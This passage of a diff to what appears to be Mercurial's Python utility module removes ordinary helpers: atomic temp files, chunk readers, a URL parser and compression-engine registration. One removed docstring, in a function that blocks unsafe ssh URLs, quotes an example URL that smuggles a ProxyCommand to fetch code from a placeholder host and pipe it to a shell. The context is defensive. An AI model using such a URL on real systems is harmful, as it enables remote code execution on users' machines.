changed. - """ - try: - return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]) - except AttributeError: - return False - - def avoidambig(self, path, old): - """Change file stat of specified path to avoid ambiguity - - 'old' should be previous filestat of 'path'. - - This skips avoiding ambiguity, if a process doesn't have - appropriate privileges for 'path'. This returns False in this - case. - - Otherwise, this returns True, as "ambiguity is avoided". - """ - advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff - try: - os.utime(path, (advanced, advanced)) - except OSError as inst: - if inst.errno == errno.EPERM: - # utime() on the file created by another user causes EPERM, - # if a process doesn't have appropriate privileges - return False - raise - return True - - def __ne__(self, other): - return not self == other - -class atomictempfile(object): - '''writable file object that atomically updates a file - - All writes will go to a temporary copy of the original file. Call - close() when you are done writing, and atomictempfile will rename - the temporary copy to the original name, making the changes - visible. If the object is destroyed without being closed, all your - writes are discarded. - - checkambig argument of constructor is used with filestat, and is - useful only if target file is guarded by any lock (e.g. repo.lock - or repo.wlock). - ''' - def __init__(self, name, mode='w+b', createmode=None, checkambig=False): - self.__name = name # permanent name - self._tempname = mktempcopy(name, emptyok=('w' in mode), - createmode=createmode) - self._fp = posixfile(self._tempname, mode) - self._checkambig = checkambig - - # delegated methods - self.read = self._fp.read - self.write = self._fp.write - self.seek = self._fp.seek - self.tell = self._fp.tell - self.fileno = self._fp.fileno - - def close(self): - if not self._fp.closed: - self._fp.close() - filename = localpath(self.__name) - oldstat = self._checkambig and filestat.frompath(filename) - if oldstat and oldstat.stat: - rename(self._tempname, filename) - newstat = filestat.frompath(filename) - if newstat.isambig(oldstat): - # stat of changed file is ambiguous to original one - advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff - os.utime(filename, (advanced, advanced)) - else: - rename(self._tempname, filename) - - def discard(self): - if not self._fp.closed: - try: - os.unlink(self._tempname) - except OSError: - pass - self._fp.close() - - def __del__(self): - if safehasattr(self, '_fp'): # constructor actually did something - self.discard() - - def __enter__(self): - return self - - def __exit__(self, exctype, excvalue, traceback): - if exctype is not None: - self.discard() - else: - self.close() - -def unlinkpath(f, ignoremissing=False): - """unlink and remove the directory if it is empty""" - if ignoremissing: - tryunlink(f) - else: - unlink(f) - # try removing directories that might now be empty - try: - removedirs(os.path.dirname(f)) - except OSError: - pass - -def tryunlink(f): - """Attempt to remove a file, ignoring ENOENT errors.""" - try: - unlink(f) - except OSError as e: - if e.errno != errno.ENOENT: - raise - -def makedirs(name, mode=None, notindexed=False): - """recursive directory creation with parent mode inheritance - - Newly created directories are marked as "not to be indexed by - the content indexing service", if ``notindexed`` is specified - for "write" mode access. - """ - try: - makedir(name, notindexed) - except OSError as err: - if err.errno == errno.EEXIST: - return - if err.errno != errno.ENOENT or not name: - raise - parent = os.path.dirname(os.path.abspath(name)) - if parent == name: - raise - makedirs(parent, mode, notindexed) - try: - makedir(name, notindexed) - except OSError as err: - # Catch EEXIST to handle races - if err.errno == errno.EEXIST: - return - raise - if mode is not None: - os.chmod(name, mode) - -def readfile(path): - with open(path, 'rb') as fp: - return fp.read() - -def writefile(path, text): - with open(path, 'wb') as fp: - fp.write(text) - -def appendfile(path, text): - with open(path, 'ab') as fp: - fp.write(text) - -class chunkbuffer(object): - """Allow arbitrary sized chunks of data to be efficiently read from an - iterator over chunks of arbitrary size.""" - - def __init__(self, in_iter): - """in_iter is the iterator that's iterating over the input chunks.""" - def splitbig(chunks): - for chunk in chunks: - if len(chunk) > 2**20: - pos = 0 - while pos < len(chunk): - end = pos + 2 ** 18 - yield chunk[pos:end] - pos = end - else: - yield chunk - self.iter = splitbig(in_iter) - self._queue = collections.deque() - self._chunkoffset = 0 - - def read(self, l=None): - """Read L bytes of data from the iterator of chunks of data. - Returns less than L bytes if the iterator runs dry. - - If size parameter is omitted, read everything""" - if l is None: - return ''.join(self.iter) - - left = l - buf = [] - queue = self._queue - while left > 0: - # refill the queue - if not queue: - target = 2**18 - for chunk in self.iter: - queue.append(chunk) - target -= len(chunk) - if target <= 0: - break - if not queue: - break - - # The easy way to do this would be to queue.popleft(), modify the - # chunk (if necessary), then queue.appendleft(). However, for cases - # where we read partial chunk content, this incurs 2 dequeue - # mutations and creates a new str for the remaining chunk in the - # queue. Our code below avoids this overhead. - - chunk = queue[0] - chunkl = len(chunk) - offset = self._chunkoffset - - # Use full chunk. - if offset == 0 and left >= chunkl: - left -= chunkl - queue.popleft() - buf.append(chunk) - # self._chunkoffset remains at 0. - continue - - chunkremaining = chunkl - offset - - # Use all of unconsumed part of chunk. - if left >= chunkremaining: - left -= chunkremaining - queue.popleft() - # offset == 0 is enabled by block above, so this won't merely - # copy via ``chunk[0:]``. - buf.append(chunk[offset:]) - self._chunkoffset = 0 - - # Partial chunk needed. - else: - buf.append(chunk[offset:offset + left]) - self._chunkoffset += left - left -= chunkremaining - - return ''.join(buf) - -def filechunkiter(f, size=131072, limit=None): - """Create a generator that produces the data in the file size - (default 131072) bytes at a time, up to optional limit (default is - to read all data). Chunks may be less than size bytes if the - chunk is the last chunk in the file, or the file is a socket or - some other type of file that sometimes reads less data than is - requested.""" - assert size >= 0 - assert limit is None or limit >= 0 - while True: - if limit is None: - nbytes = size - else: - nbytes = min(limit, size) - s = nbytes and f.read(nbytes) - if not s: - break - if limit: - limit -= len(s) - yield s - -class cappedreader(object): - """A file object proxy that allows reading up to N bytes. - - Given a source file object, instances of this type allow reading up to - N bytes from that source file object. Attempts to read past the allowed - limit are treated as EOF. - - It is assumed that I/O is not performed on the original file object - in addition to I/O that is performed by this instance. If there is, - state tracking will get out of sync and unexpected results will ensue. - """ - def __init__(self, fh, limit): - """Allow reading up to bytes from .""" - self._fh = fh - self._left = limit - - def read(self, n=-1): - if not self._left: - return b'' - - if n < 0: - n = self._left - - data = self._fh.read(min(n, self._left)) - self._left -= len(data) - assert self._left >= 0 - - return data - - def readinto(self, b): - res = self.read(len(b)) - if res is None: - return None - - b[0:len(res)] = res - return len(res) - def stringmatcher(pattern, casesensitive=True): """ accepts a string, possibly starting with 're:' or 'literal:' prefix. @@ -2667,90 +135,6 @@ def ellipsis(text, maxlength=400): """Trim string to at most maxlength (default: 400) columns in display.""" return encoding.trim(text, maxlength, ellipsis='...') -def unitcountfn(*unittable): - '''return a function that renders a readable count of some quantity''' - - def go(count): - for multiplier, divisor, format in unittable: - if abs(count) >= divisor * multiplier: - return format % (count / float(divisor)) - return unittable[-1][2] % count - - return go - -def processlinerange(fromline, toline): - """Check that linerange : makes sense and return a - 0-based range. - - >>> processlinerange(10, 20) - (9, 20) - >>> processlinerange(2, 1) - Traceback (most recent call last): - ... - ParseError: line range must be positive - >>> processlinerange(0, 5) - Traceback (most recent call last): - ... - ParseError: fromline must be strictly positive - """ - if toline - fromline < 0: - raise error.ParseError(_("line range must be positive")) - if fromline < 1: - raise error.ParseError(_("fromline must be strictly positive")) - return fromline - 1, toline - -bytecount = unitcountfn( - (100, 1 << 30, _('%.0f GB')), - (10, 1 << 30, _('%.1f GB')), - (1, 1 << 30, _('%.2f GB')), - (100, 1 << 20, _('%.0f MB')), - (10, 1 << 20, _('%.1f MB')), - (1, 1 << 20, _('%.2f MB')), - (100, 1 << 10, _('%.0f KB')), - (10, 1 << 10, _('%.1f KB')), - (1, 1 << 10, _('%.2f KB')), - (1, 1, _('%.0f bytes')), - ) - -class transformingwriter(object): - """Writable file wrapper to transform data by function""" - - def __init__(self, fp, encode): - self._fp = fp - self._encode = encode - - def close(self): - self._fp.close() - - def flush(self): - self._fp.flush() - - def write(self, data): - return self._fp.write(self._encode(data)) - -# Matches a single EOL which can either be a CRLF where repeated CR -# are removed or a LF. We do not care about old Macintosh files, so a -# stray CR is an error. -_eolre = remod.compile(br'\r*\n') - -def tolf(s): - return _eolre.sub('\n', s) - -def tocrlf(s): - return _eolre.sub('\r\n', s) - -def _crlfwriter(fp): - return transformingwriter(fp, tocrlf) - -if pycompat.oslinesep == '\r\n': - tonativeeol = tocrlf - fromnativeeol = tolf - nativeeolwriter = _crlfwriter -else: - tonativeeol = pycompat.identity - fromnativeeol = pycompat.identity - nativeeolwriter = pycompat.identity - def escapestr(s): # call underlying function of s.encode('string_escape') directly for # Python 3 compatibility @@ -2892,178 +276,6 @@ def wrap(line, width, initindent='', han subsequent_indent=hangindent) return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding)) -if (pyplatform.python_implementation() == 'CPython' and - sys.version_info < (3, 0)): - # There is an issue in CPython that some IO methods do not handle EINTR - # correctly. The following table shows what CPython version (and functions) - # are affected (buggy: has the EINTR bug, okay: otherwise): - # - # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0 - # -------------------------------------------------- - # fp.__iter__ | buggy | buggy | okay - # fp.read* | buggy | okay [1] | okay - # - # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo. - # - # Here we workaround the EINTR issue for fileobj.__iter__. Other methods - # like "read*" are ignored for now, as Python < 2.7.4 is a minority. - # - # Although we can workaround the EINTR issue for fp.__iter__, it is slower: - # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in - # CPython 2, because CPython 2 maintains an internal readahead buffer for - # fp.__iter__ but not other fp.read* methods. - # - # On modern systems like Linux, the "read" syscall cannot be interrupted - # when reading "fast" files like on-disk files. So the EINTR issue only - # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG) - # files approximately as "fast" files and use the fast (unsafe) code path, - # to minimize the performance impact. - if sys.version_info >= (2, 7, 4): - # fp.readline deals with EINTR correctly, use it as a workaround. - def _safeiterfile(fp): - return iter(fp.readline, '') - else: - # fp.read* are broken too, manually deal with EINTR in a stupid way. - # note: this may block longer than necessary because of bufsize. - def _safeiterfile(fp, bufsize=4096): - fd = fp.fileno() - line = '' - while True: - try: - buf = os.read(fd, bufsize) - except OSError as ex: - # os.read only raises EINTR before any data is read - if ex.errno == errno.EINTR: - continue - else: - raise - line += buf - if '\n' in buf: - splitted = line.splitlines(True) - line = '' - for l in splitted: - if l[-1] == '\n': - yield l - else: - line = l - if not buf: - break - if line: - yield line - - def iterfile(fp): - fastpath = True - if type(fp) is file: - fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode) - if fastpath: - return fp - else: - return _safeiterfile(fp) -else: - # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed. - def iterfile(fp): - return fp - -def iterlines(iterator): - for chunk in iterator: - for line in chunk.splitlines(): - yield line - -def expandpath(path): - return os.path.expanduser(os.path.expandvars(path)) - -def hgcmd(): - """Return the command used to execute current hg - - This is different from hgexecutable() because on Windows we want - to avoid things opening new shell windows like batch files, so we - get either the python call or current executable. - """ - if mainfrozen(): - if getattr(sys, 'frozen', None) == 'macosx_app': - # Env variable set by py2app - return [encoding.environ['EXECUTABLEPATH']] - else: - return [pycompat.sysexecutable] - return gethgcmd() - -def rundetached(args, condfn): - """Execute the argument list in a detached process. - - condfn is a callable which is called repeatedly and should return - True once the child process is known to have started successfully. - At this point, the child process PID is returned. If the child - process fails to start or finishes before condfn() evaluates to - True, return -1. - """ - # Windows case is easier because the child process is either - # successfully starting and validating the condition or exiting - # on failure. We just poll on its PID. On Unix, if the child - # process fails to start, it will be left in a zombie state until - # the parent wait on it, which we cannot do since we expect a long - # running process on success. Instead we listen for SIGCHLD telling - # us our child process terminated. - terminated = set() - def handler(signum, frame): - terminated.add(os.wait()) - prevhandler = None - SIGCHLD = getattr(signal, 'SIGCHLD', None) - if SIGCHLD is not None: - prevhandler = signal.signal(SIGCHLD, handler) - try: - pid = spawndetached(args) - while not condfn(): - if ((pid in terminated or not testpid(pid)) - and not condfn()): - return -1 - time.sleep(0.1) - return pid - finally: - if prevhandler is not None: - signal.signal(signal.SIGCHLD, prevhandler) - -def interpolate(prefix, mapping, s, fn=None, escape_prefix=False): - """Return the result of interpolating items in the mapping into string s. - - prefix is a single character string, or a two character string with - a backslash as the first character if the prefix needs to be escaped in - a regular expression. - - fn is an optional function that will be applied to the replacement text - just before replacement. - - escape_prefix is an optional flag that allows using doubled prefix for - its escaping. - """ - fn = fn or (lambda s: s) - patterns = '|'.join(mapping.keys()) - if escape_prefix: - patterns += '|' + prefix - if len(prefix) > 1: - prefix_char = prefix[1:] - else: - prefix_char = prefix - mapping[prefix_char] = prefix_char - r = remod.compile(br'%s(%s)' % (prefix, patterns)) - return r.sub(lambda x: fn(mapping[x.group()[1:]]), s) - -def getport(port): - """Return the port for a given network service. - - If port is an integer, it's returned as is. If it's a string, it's - looked up using socket.getservbyname(). If there's no matching - service, error.Abort is raised. - """ - try: - return int(port) - except ValueError: - pass - - try: - return socket.getservbyname(pycompat.sysstr(port)) - except socket.error: - raise Abort(_("no port number associated with service '%s'") % port) - _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True, '0': False, 'no': False, 'false': False, 'off': False, 'never': False} @@ -3074,1270 +286,3 @@ def parsebool(s): If s is not a valid boolean, returns None. """ return _booleans.get(s.lower(), None) - -class url(object): - r"""Reliable URL parser. - - This parses URLs and provides attributes for the following - components: - - ://:@:/?# - - Missing components are set to None. The only exception is - fragment, which is set to '' if present but empty. - - If parsefragment is False, fragment is included in query. If - parsequery is False, query is included in path. If both are - False, both fragment and query are included in path. - - See http://www.ietf.org/rfc/rfc2396.txt for more information. - - Note that for backward compatibility reasons, bundle URLs do not - take host names. That means 'bundle://../' has a path of '../'. - - Examples: - - >>> url(b'http://www.ietf.org/rfc/rfc2396.txt') - - >>> url(b'ssh://[::1]:2200//home/joe/repo') - - >>> url(b'file:///home/joe/repo') - - >>> url(b'file:///c:/temp/foo/') - - >>> url(b'bundle:foo') - - >>> url(b'bundle://../foo') - - >>> url(br'c:\foo\bar') - - >>> url(br'\\blah\blah\blah') - - >>> url(br'\\blah\blah\blah#baz') - - >>> url(br'file:///C:\users\me') - - - Authentication credentials: - - >>> url(b'ssh://joe:xyz@x/repo') - - >>> url(b'ssh://joe@x/repo') - - - Query strings and fragments: - - >>> url(b'http://host/a?b#c') - - >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False) - - - Empty path: - - >>> url(b'') - - >>> url(b'#a') - - >>> url(b'http://host/') - - >>> url(b'http://host/#a') - - - Only scheme: - - >>> url(b'http:') - - """ - - _safechars = "!~*'()+" - _safepchars = "/!~*'()+:\\" - _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match - - def __init__(self, path, parsequery=True, parsefragment=True): - # We slowly chomp away at path until we have only the path left - self.scheme = self.user = self.passwd = self.host = None - self.port = self.path = self.query = self.fragment = None - self._localpath = True - self._hostport = '' - self._origpath = path - - if parsefragment and '#' in path: - path, self.fragment = path.split('#', 1) - - # special case for Windows drive letters and UNC paths - if hasdriveletter(path) or path.startswith('\\\\'): - self.path = path - return - - # For compatibility reasons, we can't handle bundle paths as - # normal URLS - if path.startswith('bundle:'): - self.scheme = 'bundle' - path = path[7:] - if path.startswith('//'): - path = path[2:] - self.path = path - return - - if self._matchscheme(path): - parts = path.split(':', 1) - if parts[0]: - self.scheme, path = parts - self._localpath = False - - if not path: - path = None - if self._localpath: - self.path = '' - return - else: - if self._localpath: - self.path = path - return - - if parsequery and '?' in path: - path, self.query = path.split('?', 1) - if not path: - path = None - if not self.query: - self.query = None - - # // is required to specify a host/authority - if path and path.startswith('//'): - parts = path[2:].split('/', 1) - if len(parts) > 1: - self.host, path = parts - else: - self.host = parts[0] - path = None - if not self.host: - self.host = None - # path of file:///d is /d - # path of file:///d:/ is d:/, not /d:/ - if path and not hasdriveletter(path): - path = '/' + path - - if self.host and '@' in self.host: - self.user, self.host = self.host.rsplit('@', 1) - if ':' in self.user: - self.user, self.passwd = self.user.split(':', 1) - if not self.host: - self.host = None - - # Don't split on colons in IPv6 addresses without ports - if (self.host and ':' in self.host and - not (self.host.startswith('[') and self.host.endswith(']'))): - self._hostport = self.host - self.host, self.port = self.host.rsplit(':', 1) - if not self.host: - self.host = None - - if (self.host and self.scheme == 'file' and - self.host not in ('localhost', '127.0.0.1', '[::1]')): - raise Abort(_('file:// URLs can only refer to localhost')) - - self.path = path - - # leave the query string escaped - for a in ('user', 'passwd', 'host', 'port', - 'path', 'fragment'): - v = getattr(self, a) - if v is not None: - setattr(self, a, urlreq.unquote(v)) - - @encoding.strmethod - def __repr__(self): - attrs = [] - for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path', - 'query', 'fragment'): - v = getattr(self, a) - if v is not None: - attrs.append('%s: %r' % (a, v)) - return '' % ', '.join(attrs) - - def __bytes__(self): - r"""Join the URL's components back into a URL string. - - Examples: - - >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar')) - 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar' - >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42')) - 'http://user:pw@host:80/?foo=bar&baz=42' - >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz')) - 'http://user:pw@host:80/?foo=bar%3dbaz' - >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#')) - 'ssh://user:pw@[::1]:2200//home/joe#' - >>> bytes(url(b'http://localhost:80//')) - 'http://localhost:80//' - >>> bytes(url(b'http://localhost:80/')) - 'http://localhost:80/' - >>> bytes(url(b'http://localhost:80')) - 'http://localhost:80/' - >>> bytes(url(b'bundle:foo')) - 'bundle:foo' - >>> bytes(url(b'bundle://../foo')) - 'bundle:../foo' - >>> bytes(url(b'path')) - 'path' - >>> bytes(url(b'file:///tmp/foo/bar')) - 'file:///tmp/foo/bar' - >>> bytes(url(b'file:///c:/tmp/foo/bar')) - 'file:///c:/tmp/foo/bar' - >>> print(url(br'bundle:foo\bar')) - bundle:foo\bar - >>> print(url(br'file:///D:\data\hg')) - file:///D:\data\hg - """ - if self._localpath: - s = self.path - if self.scheme == 'bundle': - s = 'bundle:' + s - if self.fragment: - s += '#' + self.fragment - return s - - s = self.scheme + ':' - if self.user or self.passwd or self.host: - s += '//' - elif self.scheme and (not self.path or self.path.startswith('/') - or hasdriveletter(self.path)): - s += '//' - if hasdriveletter(self.path): - s += '/' - if self.user: - s += urlreq.quote(self.user, safe=self._safechars) - if self.passwd: - s += ':' + urlreq.quote(self.passwd, safe=self._safechars) - if self.user or self.passwd: - s += '@' - if self.host: - if not (self.host.startswith('[') and self.host.endswith(']')): - s += urlreq.quote(self.host) - else: - s += self.host - if self.port: - s += ':' + urlreq.quote(self.port) - if self.host: - s += '/' - if self.path: - # TODO: similar to the query string, we should not unescape the - # path when we store it, the path might contain '%2f' = '/', - # which we should *not* escape. - s += urlreq.quote(self.path, safe=self._safepchars) - if self.query: - # we store the query in escaped form. - s += '?' + self.query - if self.fragment is not None: - s += '#' + urlreq.quote(self.fragment, safe=self._safepchars) - return s - - __str__ = encoding.strmethod(__bytes__) - - def authinfo(self): - user, passwd = self.user, self.passwd - try: - self.user, self.passwd = None, None - s = bytes(self) - finally: - self.user, self.passwd = user, passwd - if not self.user: - return (s, None) - # authinfo[1] is passed to urllib2 password manager, and its - # URIs must not contain credentials. The host is passed in the - # URIs list because Python < 2.4.3 uses only that to search for - # a password. - return (s, (None, (s, self.host), - self.user, self.passwd or '')) - - def isabs(self): - if self.scheme and self.scheme != 'file': - return True # remote URL - if hasdriveletter(self.path): - return True # absolute for our purposes - can't be joined() - if self.path.startswith(br'\\'): - return True # Windows UNC path - if self.path.startswith('/'): - return True # POSIX-style - return False - - def localpath(self): - if self.scheme == 'file' or self.scheme == 'bundle': - path = self.path or '/' - # For Windows, we need to promote hosts containing drive - # letters to paths with drive letters. - if hasdriveletter(self._hostport): - path = self._hostport + '/' + self.path - elif (self.host is not None and self.path - and not hasdriveletter(path)): - path = '/' + path - return path - return self._origpath - - def islocal(self): - '''whether localpath will return something that posixfile can open''' - return (not self.scheme or self.scheme == 'file' - or self.scheme == 'bundle') - -def hasscheme(path): - return bool(url(path).scheme) - -def hasdriveletter(path): - return path and path[1:2] == ':' and path[0:1].isalpha() - -def urllocalpath(path): - return url(path, parsequery=False, parsefragment=False).localpath() - -def checksafessh(path): - """check if a path / url is a potentially unsafe ssh exploit (SEC) - - This is a sanity check for ssh urls. ssh will parse the first item as - an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path. - Let's prevent these potentially exploited urls entirely and warn the - user. - - Raises an error.Abort when the url is unsafe. - """ - path = urlreq.unquote(path) - if path.startswith('ssh://-') or path.startswith('svn+ssh://-'): - raise error.Abort(_('potentially unsafe url: %r') % - (pycompat.bytestr(path),)) - -def hidepassword(u): - '''hide user credential in a url string''' - u = url(u) - if u.passwd: - u.passwd = '***' - return bytes(u) - -def removeauth(u): - '''remove all authentication information from a url string''' - u = url(u) - u.user = u.passwd = None - return str(u) - -timecount = unitcountfn( - (1, 1e3, _('%.0f s')), - (100, 1, _('%.1f s')), - (10, 1, _('%.2f s')), - (1, 1, _('%.3f s')), - (100, 0.001, _('%.1f ms')), - (10, 0.001, _('%.2f ms')), - (1, 0.001, _('%.3f ms')), - (100, 0.000001, _('%.1f us')), - (10, 0.000001, _('%.2f us')), - (1, 0.000001, _('%.3f us')), - (100, 0.000000001, _('%.1f ns')), - (10, 0.000000001, _('%.2f ns')), - (1, 0.000000001, _('%.3f ns')), - ) - -_timenesting = [0] - -def timed(func): - '''Report the execution time of a function call to stderr. - - During development, use as a decorator when you need to measure - the cost of a function, e.g. as follows: - - @util.timed - def foo(a, b, c): - pass - ''' - - def wrapper(*args, **kwargs): - start = timer() - indent = 2 - _timenesting[0] += indent - try: - return func(*args, **kwargs) - finally: - elapsed = timer() - start - _timenesting[0] -= indent - stderr.write('%s%s: %s\n' % - (' ' * _timenesting[0], func.__name__, - timecount(elapsed))) - return wrapper - -_sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30), - ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1)) - -def sizetoint(s): - '''Convert a space specifier to a byte count. - - >>> sizetoint(b'30') - 30 - >>> sizetoint(b'2.2kb') - 2252 - >>> sizetoint(b'6M') - 6291456 - ''' - t = s.strip().lower() - try: - for k, u in _sizeunits: - if t.endswith(k): - return int(float(t[:-len(k)]) * u) - return int(t) - except ValueError: - raise error.ParseError(_("couldn't parse size: %s") % s) - -class hooks(object): - '''A collection of hook functions that can be used to extend a - function's behavior. Hooks are called in lexicographic order, - based on the names of their sources.''' - - def __init__(self): - self._hooks = [] - - def add(self, source, hook): - self._hooks.append((source, hook)) - - def __call__(self, *args): - self._hooks.sort(key=lambda x: x[0]) - results = [] - for source, hook in self._hooks: - results.append(hook(*args)) - return results - -def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0): - '''Yields lines for a nicely formatted stacktrace. - Skips the 'skip' last entries, then return the last 'depth' entries. - Each file+linenumber is formatted according to fileline. - Each line is formatted according to line. - If line is None, it yields: - length of longest filepath+line number, - filepath+linenumber, - function - - Not be used in production code but very convenient while developing. - ''' - entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func)) - for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1] - ][-depth:] - if entries: - fnmax = max(len(entry[0]) for entry in entries) - for fnln, func in entries: - if line is None: - yield (fnmax, fnln, func) - else: - yield line % (fnmax, fnln, func) - -def debugstacktrace(msg='stacktrace', skip=0, - f=stderr, otherf=stdout, depth=0): - '''Writes a message to f (stderr) with a nicely formatted stacktrace. - Skips the 'skip' entries closest to the call, then show 'depth' entries. - By default it will flush stdout first. - It can be used everywhere and intentionally does not require an ui object. - Not be used in production code but very convenient while developing. - ''' - if otherf: - otherf.flush() - f.write('%s at:\n' % msg.rstrip()) - for line in getstackframes(skip + 1, depth=depth): - f.write(line) - f.flush() - -class dirs(object): - '''a multiset of directory names from a dirstate or manifest''' - - def __init__(self, map, skip=None): - self._dirs = {} - addpath = self.addpath - if safehasattr(map, 'iteritems') and skip is not None: - for f, s in map.iteritems(): - if s[0] != skip: - addpath(f) - else: - for f in map: - addpath(f) - - def addpath(self, path): - dirs = self._dirs - for base in finddirs(path): - if base in dirs: - dirs[base] += 1 - return - dirs[base] = 1 - - def delpath(self, path): - dirs = self._dirs - for base in finddirs(path): - if dirs[base] > 1: - dirs[base] -= 1 - return - del dirs[base] - - def __iter__(self): - return iter(self._dirs) - - def __contains__(self, d): - return d in self._dirs - -if safehasattr(parsers, 'dirs'): - dirs = parsers.dirs - -def finddirs(path): - pos = path.rfind('/') - while pos != -1: - yield path[:pos] - pos = path.rfind('/', 0, pos) - -# compression code - -SERVERROLE = 'server' -CLIENTROLE = 'client' - -compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport', - (u'name', u'serverpriority', - u'clientpriority')) - -class compressormanager(object): - """Holds registrations of various compression engines. - - This class essentially abstracts the differences between compression - engines to allow new compression formats to be added easily, possibly from - extensions. - - Compressors are registered against the global instance by calling its - ``register()`` method. - """ - def __init__(self): - self._engines = {} - # Bundle spec human name to engine name. - self._bundlenames = {} - # Internal bundle identifier to engine name. - self._bundletypes = {} - # Revlog header to engine name. - self._revlogheaders = {} - # Wire proto identifier to engine name. - self._wiretypes = {} - - def __getitem__(self, key): - return self._engines[key] - - def __contains__(self, key): - return key in self._engines - - def __iter__(self): - return iter(self._engines.keys()) - - def register(self, engine): - """Register a compression engine with the manager. - - The argument must be a ``compressionengine`` instance. - """ - if not isinstance(engine, compressionengine): - raise ValueError(_('argument must be a compressionengine')) - - name = engine.name() - - if name in self._engines: - raise error.Abort(_('compression engine %s already registered') % - name) - - bundleinfo = engine.bundletype() - if bundleinfo: - bundlename, bundletype = bundleinfo - - if bundlename in self._bundlenames: - raise error.Abort(_('bundle name %s already registered') % - bundlename) - if bundletype in self._bundletypes: - raise error.Abort(_('bundle type %s already registered by %s') % - (bundletype, self._bundletypes[bundletype])) - - # No external facing name declared. - if bundlename: - self._bundlenames[bundlename] = name - - self._bundletypes[bundletype] = name - - wiresupport = engine.wireprotosupport() - if wiresupport: - wiretype = wiresupport.name - if wiretype in self._wiretypes: - raise error.Abort(_('wire protocol compression %s already ' - 'registered by %s') % - (wiretype, self._wiretypes[wiretype])) - - self._wiretypes[wiretype] = name - - revlogheader = engine.revlogheader() - if revlogheader and revlogheader in self._revlogheaders: - raise error.Abort(_('revlog header %s already registered by %s') % - (revlogheader, self._revlogheaders[revlogheader])) - - if revlogheader: - self._revlogheaders[revlogheader] = name - - self._engines[name] = engine - - @property - def supportedbundlenames(self): - return set(self._bundlenames.keys()) - - @property - def supportedbundletypes(self): - return set(self._bundletypes.keys()) - - def forbundlename(self, bundlename): - """Obtain a compression engine registered to a bundle name. - - Will raise KeyError if the bundle type isn't registered. - - Will abort if the engine is known but not available. - """ - engine = self._engines[self._bundlenames[bundlename]] - if not engine.available(): - raise error.Abort(_('compression engine %s could not be loaded') % - engine.name()) - return engine - - def forbundletype(self, bundletype): - """Obtain a compression engine registered to a bundle type. - - Will raise KeyError if the bundle type isn't registered. - - Will abort if the engine is known but not available. - """ - engine = self._engines[self._bundletypes[bundletype]] - if not engine.available(): - raise error.Abort(_('compression engine %s could not be loaded') % - engine.name()) - return engine - - def supportedwireengines(self, role, onlyavailable=True): - """Obtain compression engines that support the wire protocol. - - Returns a list of engines in prioritized order, most desired first. - - If ``onlyavailable`` is set, filter out engines that can't be - loaded. - """ - assert role in (SERVERROLE, CLIENTROLE) - - attr = 'serverpriority' if role == SERVERROLE else 'clientpriority' - - engines = [self._engines[e] for e in self._wiretypes.values()] - if onlyavailable: - engines = [e for e in engines if e.available()] - - def getkey(e): - # Sort first by priority, highest first. In case of tie, sort - # alphabetically. This is arbitrary, but ensures output is - # stable. - w = e.wireprotosupport() - return -1 * getattr(w, attr), w.name - - return list(sorted(engines, key=getkey)) - - def forwiretype(self, wiretype): - engine = self._engines[self._wiretypes[wiretype]] - if not engine.available(): - raise error.Abort(_('compression engine %s could not be loaded') % - engine.name()) - return engine - - def forrevlogheader(self, header): - """Obtain a compression engine registered to a revlog header. - - Will raise KeyError if the revlog header value isn't registered. - """ - return self._engines[self._revlogheaders[header]] - -compengines = compressormanager() - -class compressionengine(object): - """Base class for compression engines. - - Compression engines must implement the interface defined by this class. - """ - def name(self): - """Returns the name of the compression engine. - - This is the key the engine is registered under. - - This method must be implemented. - """ - raise NotImplementedError() - - def available(self): - """Whether the compression engine is available. - - The intent of this method is to allow optional compression engines - that may not be available in all installations (such as engines relying - on C extensions that may not be present). - """ - return True - - def bundletype(self): - """Describes bundle identifiers for this engine. - - If this compression engine isn't supported for bundles, returns None. - - If this engine can be used for bundles, returns a 2-tuple of strings of - the user-facing "bundle spec" compression name and an internal - identifier used to denote the compression format within bundles. To - exclude the name from external usage, set the first element to ``None``. - - If bundle compression is supported, the class must also implement - ``compressstream`` and `decompressorreader``. - - The docstring of this method is used in the help system to tell users - about this engine. - """ - return None - - def wireprotosupport(self): - """Declare support for this compression format on the wire protocol. - - If this compression engine isn't supported for compressing wire - protocol payloads, returns None. - - Otherwise, returns ``compenginewireprotosupport`` with the following - fields: - - * String format identifier - * Integer priority for the server - * Integer priority for the client - - The integer priorities are used to order the advertisement of format - support by server and client. The highest integer is advertised - first. Integers with non-positive values aren't advertised. - - The priority values are somewhat arbitrary and only used for default - ordering. The relative order can be changed via config options. - - If wire protocol compression is supported, the class must also implement - ``compressstream`` and ``decompressorreader``. - """ - return None - - def revlogheader(self): - """Header added to revlog chunks that identifies this engine. - - If this engine can be used to compress revlogs, this method should - return the bytes used to identify chunks compressed with this engine. - Else, the method should return ``None`` to indicate it does not - participate in revlog compression. - """ - return None - - def compressstream(self, it, opts=None): - """Compress an iterator of chunks. - - The method receives an iterator (ideally a generator) of chunks of - bytes to be compressed. It returns an iterator (ideally a generator) - of bytes of chunks representing the compressed output. - - Optionally accepts an argument defining how to perform compression. - Each engine treats this argument differently. - """ - raise 